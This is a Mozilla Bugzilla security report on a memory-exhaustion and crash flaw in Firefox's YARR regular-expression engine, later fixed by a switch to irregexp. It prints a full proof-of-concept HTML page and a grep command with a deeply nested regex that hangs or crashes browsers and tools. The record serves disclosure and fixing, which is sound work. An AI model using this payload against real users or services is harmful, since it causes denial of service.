Closed Bug 981446 Opened 11 years ago Closed 11 years ago

YARR regexp Memory exhaustion and crash

Categories

(Core :: JavaScript Engine, defect)

Product:
Core
Component:
JavaScript Engine
Version:
27 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
VERIFIED FIXED
Milestone:
mozilla32
Tracking Flags:
Tracking Status
firefox-esr31 --- wontfix

People

(Reporter: max, Unassigned)

References

Details

(Keywords: crash, csectype-dos, sec-low)

Crash Data

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36 Steps to reproduce: http://cert.cx/regexp-smaczki/regex.html --- <HTML> <HEAD> <TITLE>Firefox 27.0.1 and Safari 7.0.2 (9537.74.9)</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF"> <SCRIPT type="text/javascript"> var patt1=new RegExp("((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))"); document.write(patt1.exec("cxsecurity")); </SCRIPT> </BODY> </HTML> --- Actual results: memory exhaustion and crash Observed memory exhaustion in Safari and Firefox under MacOSX. Under windows Firefox has allocated 3,8GB http://cert.cx/regexp-smaczki/regcomp1.png and crash http://cert.cx/regexp-smaczki/regcomp3.png
Hardware: x86 → x86_64
Summary: regexp → Firefox 27.0.1 regexp Memory exhaustion and crash
Component: Untriaged → JavaScript Engine
Product: Firefox → Core
What is the ID of the crash report you get? It will be listed in about:crashes.
The sample made my browser hang and eventually, it used up all of the memory on my system, but no crash. Good DoS though.
Crash only under windows and if more that 4gb free. Some another PoC for MacOSX 10.9.2 000000000000000:kozak6 cx$ ls |grep -E '((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))' grep(715,0x7fff746ed310) malloc: *** mach_vm_map(size=18446744071973109760) failed (error code=3) *** error: can't allocate region *** set a breakpoint in malloc_error_break to debug grep: out of memory
On x64 Nightly Windows it consumes enough memory to quickly DOS the operating system. On 32 bit Firefox Nightly I crashed at [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] https://crash-stats.mozilla.com/report/index/8e2997ff-71ea-489f-a427-e387d2140316 [@ JSC::Yarr::YarrPatternConstructor::copyDisjunction(JSC::Yarr::PatternDisjunction*, bool) ] https://crash-stats.mozilla.com/report/index/d3c0593b-13ab-4ee6-ba52-dac7d2140316 https://crash-stats.mozilla.com/report/index/9bd828e0-b6c5-45b6-8b89-648f42140316 [@ JSObject::getType(JSContext*) ] https://crash-stats.mozilla.com/report/index/e33ef987-f160-4b46-8030-0ff062140316 https://crash-stats.mozilla.com/report/index/04b8743d-b489-4931-9eb4-00ec22140316
Status: UNCONFIRMED → NEW
Crash Signature: [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ]
Ever confirmed: true
OS: Mac OS X → All
Hardware: x86_64 → All
Group: core-security
Keywords: csectype-dos, sec-low
Summary: Firefox 27.0.1 regexp Memory exhaustion and crash → YARR regexp Memory exhaustion and crash
Crash Signature: [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] → [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] [@ JSC::Yarr::YarrPatternConstructor::copyDisjunction(JSC::Yarr::PatternDisjunction*, boo…
Max: is this regexp memory exhaustion and crash still an issue in Firefox's Nightly channel? We replaced YARR with irregexp in Nightly 32 (bug 976446).
Depends on: 976446
Flags: needinfo?(max)
Keywords: crash
I confirm that bad memory allocation and crash eliminated. irregexp is good choice
Flags: needinfo?(max)
Assuming fixed by bug 976446.
Status: NEW → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla32
There is only one Yarr related crash in the last 3 days in the 32 or 33 channels, and it's for a 20140509030227 build.
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.